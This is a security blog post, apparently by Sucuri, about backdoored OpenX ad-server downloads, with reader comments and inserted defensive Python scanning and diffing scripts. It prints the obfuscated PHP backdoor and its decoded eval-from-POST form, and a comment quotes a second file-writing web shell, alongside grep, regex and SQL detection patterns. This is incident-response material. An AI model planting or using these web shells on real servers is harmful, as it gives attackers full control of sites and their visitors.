OpenX.org Compromised and Downloads Injected with a Backdoor

We have received reports that OpenX.org was compromised and that the OpenX download files had a backdoor injected into them. According to Heise (in German), the malicious files were modified around November 2012 and have gone undetected since.

This means that if you have downloaded OpenX during the last 7 months, it likely contains a backdoor that could give the attackers full access to your site. That is how serious it is.

*The OpenX team has confirmed the breach and removed the malicious files from their servers.

OpenX Backdoor

We have not yet obtained a copy of the infected package, but according to public sources the backdoor is hidden inside:

/plugins/deliveryLog/vastServeVideoPlayer/flowplayer/3.1.1/flowplayer-3.1.1.min.js

It can be found by searching for PHP tags inside .js files.

This is what the backdoor looks like:

this.each(function(){l=flashembed(this,k,j)}<?php /*if(e)
{jQuery.tools=jQuery.tools||{version:
{}};jQuery.tools.version.flashembed='1.0.2'; 
*/$j='ex'./**/'plode'; /* if(this.className ...

If you look closely you can see PHP code interleaved with the JavaScript, which is meant to make it harder to spot. Everything between /* and */ is a PHP comment, so the interpreter skips the JavaScript-looking text and executes only the PHP statements, and splitting the string 'explode' into 'ex'.'plode' defeats naive signature matching.

After decoding it looks like this:

<?php
$j='explode';
// $_ = array('strrev', 'str_rot13', 'vastPlayer')
$_=$j(",",'strrev,str_rot13,vastPlayer');
// equivalent to: eval(str_rot13(strrev($_POST['vastPlayer'])))
eval ( $_[1]($_[0]( $_POST[$_[2]])) );

The code reverses and ROT13-decodes whatever is sent in the vastPlayer POST parameter and passes the result to eval(), so the attackers can execute arbitrary PHP on the server with a single request. A POST request carrying a vastPlayer parameter to this .js file in your logs is therefore a strong indication that the backdoor has been used.

Here is a simple command to check whether your OpenX install has the backdoor:

$ grep -r --include "*.js" '<?php' DIRECTORYWHEREYOURSITEIS
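As an added example (not code from the Sucuri post or from OpenX), the following Python script performs the same check as the grep command above across a web root, reporting every .js file that contains a PHP open tag and marking files that also show eval() fed from a request superglobal. It also decodes a captured vastPlayer parameter value exactly the way the decoded backdoor's eval() line would, so an incident responder with a WAF or proxy capture can see what was executed. The function names scan_js_for_php and decode_backdoor_payload, the temporary directory layout, the clean app.js file and the captured parameter value are all constructed for this demonstration; the infected fixture reuses the snippet quoted in the post, placed at the path the post names.

```python
"""Added example: find PHP tags in .js files and decode a captured
backdoor parameter. Fixture paths and contents are constructed."""
import codecs
import os
import re
import sys
import tempfile

# A PHP open tag has no business inside a JavaScript file. The pattern also
# catches the short echo tag and tags separated from their code by a comment.
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
# Hallmarks of a one-line web shell: eval/assert fed from a request superglobal.
SHELL_HINT = re.compile(r"\b(?:eval|assert)\s*\(|\$_(?:POST|GET|REQUEST|COOKIE)\b")

# Constructed fixture: the snippet quoted in the post, at the path the post
# names, beside a clean file that must not be flagged.
INFECTED_PATH = ("plugins/deliveryLog/vastServeVideoPlayer/flowplayer/3.1.1/"
                 "flowplayer-3.1.1.min.js")
INFECTED_SNIPPET = (
    "this.each(function(){l=flashembed(this,k,j)}<?php /*if(e)\n"
    "{jQuery.tools=jQuery.tools||{version:\n"
    "{}};jQuery.tools.version.flashembed='1.0.2';\n"
    "*/$j='ex'./**/'plode'; /* if(this.className ...\n"
)
CLEAN_SNIPPET = "jQuery(function($){ $('.player').flashembed(); });\n"


def build_sample_tree():
    """Write the constructed fixture into a temp dir and return its root."""
    root = tempfile.mkdtemp(prefix="openx-scan-")
    for rel, body in ((INFECTED_PATH, INFECTED_SNIPPET),
                      ("www/js/app.js", CLEAN_SNIPPET)):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def scan_js_for_php(root):
    """Return [(relative_path, line_no, severity)] for each .js line with a PHP tag.

    severity is 'shell' when the file also shows eval/superglobal use and
    'php-tag' otherwise; either finding warrants a diff against a clean copy."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".js"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "r", encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            severity = "shell" if SHELL_HINT.search(text) else "php-tag"
            for n, line in enumerate(text.splitlines(), 1):
                if PHP_TAG.search(line):
                    hits.append((os.path.relpath(full, root), n, severity))
    return hits


def decode_backdoor_payload(post_value):
    """Undo the backdoor's transform, eval(str_rot13(strrev($_POST['vastPlayer']))).

    Given the raw vastPlayer value from a captured request, return the PHP
    source that eval() would have executed (forensic use: what ran?)."""
    return codecs.decode(post_value[::-1], "rot13")


# Constructed sample of a captured parameter value, for the demonstration only.
CAPTURED_VASTPLAYER = ";'vu' bupr"

if __name__ == "__main__":
    # Pass a real site root as the first argument; otherwise the fixture is scanned.
    root = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    for path, line_no, severity in scan_js_for_php(root):
        print(f"{severity}: {path}:{line_no}")
    print("decoded payload:", decode_backdoor_payload(CAPTURED_VASTPLAYER))
```

Run it against the fixture and the flowplayer file is reported on line 1 as 'php-tag' (the quoted fragment does not include the eval line, so the 'shell' severity is not triggered), while the clean app.js stays silent; the constructed capture decodes to a harmless echo statement.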

Our team is still investigating the issue, and we will provide more details soon.

About Daniel Cid

Sucuri CTO, OSSEC Founder, open source developer and information security professional - dcid.me

  • The_Magic_M

    Attacker then puts lots of files with code like this:

    <?php if (sha1($_REQUEST[z]) == '[REDACTED]'){@file_put_contents(stripslashes($_REQUEST[e]),stripslashes($_REQUEST[t]));die(md5('md5'));}

    on the server (often replacing “file_put_contents” with “system” or “call_user_func” etc.), plus a couple of more complex backdoors containing obfuscated PHP code.

    Best way to check installation is to run a diff versus a clean download of the same version.

  • The_Magic_M

    Files found not present in default installation containing obfuscated code:

    plugins/api/api.php
    var/cache/minify_8faf80e_mergedDeliveryFunctions.php
    www/admin/plugins/oxMarket/market-settings.php
    www/images/layerstyles/geocities/geocities.php
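The two comments above recommend diffing an install against a clean download of the same version and list files that were planted outside the default layout. As an added example (not code from the post, the commenters, or OpenX), this Python script compares two directory trees by SHA-256 and reports files only present in the install, files whose contents differ, and files that are missing. The function names compare_trees and hash_tree, the optional ignore prefixes, and the two fixture trees are constructed for this demonstration; the fixture reuses the flowplayer path from the post and two of the planted file paths from the comment.

```python
"""Added example: diff an OpenX install against a clean download.
Both trees below are constructed fixtures."""
import hashlib
import os
import tempfile

JS_PATH = ("plugins/deliveryLog/vastServeVideoPlayer/flowplayer/3.1.1/"
           "flowplayer-3.1.1.min.js")


def sha256_of(path):
    """Stream a file through SHA-256 so large assets do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root, ignore=()):
    """Map relative path -> sha256 for every regular file under root.

    ignore is a tuple of relative-path prefixes to skip (e.g. compiled
    templates); leave it empty on a first pass, since planted files have
    been found in var/cache too."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if rel.startswith(ignore):
                continue
            out[rel] = sha256_of(full)
    return out


def compare_trees(installed, clean, ignore=()):
    """Return (extra, modified, missing) as sorted lists of relative paths.

    extra: only in the install (planted files such as plugins/api/api.php);
    modified: in both with different content (injected code);
    missing: only in the clean copy (removed or renamed by an attacker)."""
    a, b = hash_tree(installed, ignore), hash_tree(clean, ignore)
    extra = sorted(set(a) - set(b))
    missing = sorted(set(b) - set(a))
    modified = sorted(p for p in set(a) & set(b) if a[p] != b[p])
    return extra, modified, missing


def write_files(root, files):
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)


def build_fixture():
    """Constructed clean tree plus a tampered copy; returns (installed, clean)."""
    clean = tempfile.mkdtemp(prefix="openx-clean-")
    installed = tempfile.mkdtemp(prefix="openx-live-")
    base = {
        "www/admin/index.php": "<?php require_once 'init.php';\n",
        JS_PATH: "this.each(function(){l=flashembed(this,k,j)});\n",
        "var/cache/.htaccess": "Deny from all\n",
    }
    write_files(clean, base)
    tampered = dict(base)
    # The shipped JS file got PHP appended; two extra files appeared at paths
    # taken from the comment above (contents here are placeholders).
    tampered[JS_PATH] += "<?php /* placeholder */\n"
    tampered["plugins/api/api.php"] = "<?php /* placeholder */\n"
    tampered["www/images/layerstyles/geocities/geocities.php"] = "<?php /* placeholder */\n"
    write_files(installed, tampered)
    return installed, clean


if __name__ == "__main__":
    live, pristine = build_fixture()
    for label, paths in zip(("extra", "modified", "missing"), compare_trees(live, pristine)):
        for p in paths:
            print(f"{label}: {p}")
```

For a real check, unpack the official archive for your exact version into one directory and pass your web root and that directory to compare_trees; anything reported as extra or modified needs to be read before the install is trusted again.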

  • Ignacio Colautti

    Is there a way of fixing this ?

    • The_Magic_M

      OpenX.org has a fixed version, 2.8.11, out.

    • The_Magic_M

      OpenX has version 2.8.11 out which fixes the problem. See their website.

  • The_Magic_M

    Also, when compromised, look in the "banners" table of your OpenX database for cases where
    prepend != ''
    or more precisely
    prepend LIKE '%iframe%'
    This will typically show JavaScript code trying to exploit client vulnerabilities. Attacker seems to overwrite all contents of all "prepend" fields with the same JS code.

  • http://www.kizi-2.net/ kizi 2

    Is that a form of the virus? How would its effects

    • The_Magic_M

      Read my postings below.
      Main focus seemed to be to deliver malware with the ads delivered, though attacker might use his own backdoors for further malicious activities later if system isn’t patched.

  • Linces Marques

    No, no solution until now. Today, 24/09/2013, the version is OpenX 2.8.11, and this problem is still there.

    It is a shame. Does the "paid" version have this problem?